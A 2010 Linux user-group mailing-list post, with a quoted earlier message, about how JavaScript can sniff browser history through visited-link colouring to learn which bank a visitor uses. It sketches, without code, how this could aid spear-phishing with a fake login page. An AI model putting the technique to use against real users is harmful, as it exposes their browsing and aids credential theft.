[kwlug-disc] DuckDuckGo.com -- an alternate search engine

Fernando Duran liberosec at yahoo.ca
Tue Aug 3 15:46:17 EDT 2010 

Hi,

It's JavaScript so the source code for the trick is available in the page. As 
it's been said it's based on the browser's capability to know the sites you've 
visited before (same as when it changes the colour of a visited link). I just 
took somebody's (open source) code and added some of the most common Canadian 
web sites.

There's no  privacy issue I can think of unless someone could correlate for 
example the visitor's IP address with an identity. In any case the information 
of what's our bank is so easy to get by traditional means that we can consider 
it public.

There's also no direct security issue with the JS trick although it could be 
used in some sort of "spear-phishing" to convince a potential victim in a 
malicious web page (where it's detected he uses bank X) to click on a false page 
resembling X to get his login information.
 ---------------------
Fernando Duran
http://www.fduran.com



----- Original Message ----
> From: Johnny Ferguson <hyperflexed at gmail.com>
> To: kwlug-disc at kwlug.org
> Sent: Thu, July 29, 2010 4:36:34 PM
> Subject: Re: [kwlug-disc] DuckDuckGo.com -- an alternate search engine
> 
> On 07/28/2010 11:12 AM, Fernando Duran wrote:
> >
> >
> > -----  Original Message ----
> >> From: Eric Gerlach<eric+kwlug at gerlach.ca>
> >  ...
> >>
> >> Attack #1: Using existing  logins
> >>
> >> - You're logged into  a site you care about  (let's say your bank, or
> >>    launchpad)
> >> -   Malicious Javascript looks through your history (yes, it can do  this)
> >>     to find recently visited sites that it knows  about
> >
> >
> > Just tooting my own horn: detecting browser's  history is very easy to do, 
we
> > implemented it in http://watsec.com/myip
> >
> 
> How is this accomplished? I'm rather  disgusted that enabling js can let 
> people know who my bank  is.
> 
> -Johnny
> 
> > Cheers,
> >
> > Fernando
> > http://fduran.com
> >
> >
> >
> >
> >
> >  _______________________________________________
> > kwlug-disc_kwlug.org  mailing list
> > kwlug-disc_kwlug.org at kwlug.org
> > http://astoria.ccjclearline.com/mailman/listinfo/kwlug-disc_kwlug.org
> 
> 
> _______________________________________________
> kwlug-disc_kwlug.org  mailing list
> kwlug-disc_kwlug.org at kwlug.org
> http://astoria.ccjclearline.com/mailman/listinfo/kwlug-disc_kwlug.org
>

More information about the kwlug-disc mailing list